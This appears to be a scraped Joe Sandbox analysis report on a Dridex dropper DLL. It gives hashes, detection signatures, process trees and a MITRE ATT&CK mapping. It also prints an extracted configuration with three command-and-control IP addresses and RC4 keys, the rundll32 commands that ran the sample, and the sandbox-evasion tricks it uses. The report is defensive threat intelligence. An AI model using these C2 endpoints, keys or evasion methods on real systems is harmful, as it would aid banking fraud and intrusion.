Play interactive tour

Edit tour

Analysis Report RuRxpMUPN7.dll

Overview

General Information

Sample Name:	RuRxpMUPN7.dll
Analysis ID:	392882
MD5:	f6a73ad1c962b6d3d979066d37da71b5
SHA1:	c19b72b1b07a8065f2a62be97cb1cccfb1d5b93f
SHA256:	8d357ea7f4cbfcbbd9af86a34c421b7011204c83efa788b2527a79f9c464f287
Tags:	40111Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6972 cmdline: loaddll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6992 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 7024 cmdline: rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7108 cmdline: rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 144 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.1042088128.000000006FC41000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.rundll32.exe.6fc40000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.2.rundll32.exe.6fc40000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.2.rundll32.exe.6fc40000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Machine Learning detection for sample

Show sources

Source: RuRxpMUPN7.dll

Joe Sandbox ML: detected

Source: 2.2.rundll32.exe.33f0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.2.rundll32.exe.2fe0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 0.2.loaddll32.exe.1100000.1.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: RuRxpMUPN7.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: RuRxpMUPN7.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: opengl32.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb:0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.984067740.0000000002F34000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.988831503.0000000005140000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.721845688.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.793571336.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.721845688.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.793571336.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdbX0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: glu32.pdbT0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.997251778.00000000029C2000.00000004.00000010.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdbR0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.988835590.0000000005144000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.988831503.0000000005140000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp, RuRxpMUPN7.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 0000000D.00000003.988835590.0000000005144000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.984071985.0000000002F3A000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.984067740.0000000002F34000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb~0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.988831503.0000000005140000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.983946033.0000000002F2E000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 94.247.168.64:443
Source: Malware configuration extractor	IPs: 159.203.93.122:8172
Source: Malware configuration extractor	IPs: 50.116.27.97:2303

Source: Joe Sandbox View	IP Address: 159.203.93.122 159.203.93.122
Source: Joe Sandbox View	IP Address: 50.116.27.97 50.116.27.97

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: GLESYS-ASSE GLESYS-ASSE

Source: RuRxpMUPN7.dll

String found in binary or memory: http://ansicon.adoxa.vze.com/6

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1042088128.000000006FC41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.rundll32.exe.6fc40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6fc40000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC52790 NtAllocateVirtualMemory,	2_2_6FC52790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC5218C NtDelayExecution,	2_2_6FC5218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC4BC00 NtClose,	2_2_6FC4BC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC507CC	2_2_6FC507CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC41494	2_2_6FC41494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC592DC	2_2_6FC592DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC4A5A4	2_2_6FC4A5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC49144	2_2_6FC49144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC514D8	2_2_6FC514D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC484E4	2_2_6FC484E4

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 144

Source: RuRxpMUPN7.dll

Binary or memory string: OriginalFilenameANSI32.dll0 vs RuRxpMUPN7.dll

Source: RuRxpMUPN7.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: RuRxpMUPN7.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal80.bank.troj.evad.winDLL@8/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6972

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF739.tmp

Jump to behavior

Source: RuRxpMUPN7.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',ReadLogRecord
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 144
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',ReadLogRecord	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1	Jump to behavior

Source: RuRxpMUPN7.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: RuRxpMUPN7.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: opengl32.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb:0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.984067740.0000000002F34000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.988831503.0000000005140000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.721845688.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.793571336.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.721845688.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.793571336.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdbX0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: glu32.pdbT0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.997251778.00000000029C2000.00000004.00000010.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdbR0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.988835590.0000000005144000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.988831503.0000000005140000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp, RuRxpMUPN7.dll
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdbk source: WerFault.exe, 0000000D.00000003.988835590.0000000005144000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.984071985.0000000002F3A000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.984067740.0000000002F34000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb~0 source: WerFault.exe, 0000000D.00000003.988839185.0000000005147000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.988831503.0000000005140000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.988794875.0000000005021000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.983946033.0000000002F2E000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC4F744 push esi; mov dword ptr [esp], 00000000h

2_2_6FC4F745

Source: initial sample

Static PE information: section name: .text entropy: 7.55877156847

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 1690

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 957			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 732			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC507CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

2_2_6FC507CC

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WerFault.exe, 0000000D.00000002.1002368009.00000000051D0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000000D.00000002.1002368009.00000000051D0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000000D.00000002.1002368009.00000000051D0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000000D.00000002.1002368009.00000000051D0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC46DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_6FC46DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC53060 RtlAddVectoredExceptionHandler,

2_2_6FC53060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\RuRxpMUPN7.dll',#1

Jump to behavior

Source: rundll32.exe, 00000002.00000002.1042841977.00000000038B0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1041736427.0000000003490000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000002.00000002.1042841977.00000000038B0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1041736427.0000000003490000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.1042841977.00000000038B0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1041736427.0000000003490000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000002.1042841977.00000000038B0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1041736427.0000000003490000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_6FC46DC8

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_6FC46DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	OS Credential Dumping	Security Software Discovery111	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RuRxpMUPN7.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.rundll32.exe.33f0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.2.rundll32.exe.2fe0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
0.2.loaddll32.exe.1100000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ansicon.adoxa.vze.com/6	RuRxpMUPN7.dll	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
159.203.93.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.27.97	unknown	United States	63949	LINODE-APLinodeLLCUS	true
94.247.168.64	unknown	Sweden	43948	GLESYS-ASSE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	392882
Start date:	19.04.2021
Start time:	23:43:34
